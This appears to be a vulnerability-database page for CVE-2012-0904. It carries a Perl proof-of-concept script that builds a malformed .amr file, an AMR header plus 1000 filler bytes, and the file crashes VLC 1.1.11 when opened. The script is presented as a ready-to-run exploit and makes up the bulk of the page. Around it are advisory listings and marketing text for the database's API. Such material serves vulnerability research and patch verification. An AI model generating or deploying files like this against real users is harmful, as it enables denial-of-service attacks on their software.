VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2012-0904 | 4 Jan 201200:00 | – | circl | |
| CVE-2012-0904 | 20 Jan 201217:00 | – | cve | |
| CVE-2012-0904 | 20 Jan 201217:00 | – | cvelist | |
| CVE-2012-0904 | 20 Jan 201217:00 | – | debiancve | |
| CVE-2012-0904 | 20 Jan 201217:55 | – | nvd | |
| VLC Media Player '.amr' File Denial of Service Vulnerability - Windows | 23 Jan 201200:00 | – | openvas | |
| VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) | 23 Jan 201200:00 | – | openvas | |
| Code injection | 20 Jan 201217:55 | – | prion | |
| CVE-2012-0904 | 20 Jan 201217:55 | – | ubuntucve | |
| VLC < 1.1.12 DoS | 9 Jul 202000:00 | – | nessus |
10
#!/usr/bin/perl
##
# Exploit Title: VLC media player v1.1.11 (.amr) Local Crash PoC
# Date: 04.01.2012
# Author: Fabi@habsec ([email protected])
# Software Link: http://sourceforge.net/projects/vlc/files/1.1.11/win32/vlc-1.1.11-win32.exe
# Version: 1.1.11
# Tested on: Windows 7 x86 English
#
# Description: Unhandled Access Violation Exception loading generated .amr file
# - 1.1.10 not affected!
#
##
#
#
#
system("title VLC .amr crash PoC");
system("cls");
print "\n";
print " [*] Name : VLC media player v1.1.11 (Adaptive Multi-Rate)\n";
print " [*] Exploit : Local Crash PoC \n";
sleep(2);
print "\n";
my $amr_boof = "\x23\x21\x41\x4D\x52"; # Treat as AMR
$amr_boof .= "\x41"x1000; # j4f
open(file , ">", "b00f.amr");
print file $amr_boof;
print " [+] File successfully created! Open in VLC or drag to playlist..\n" or die print "\n Wuups- Could not create File.. ";
close(file);
#
#Hannibal ante portasData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jan 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.05112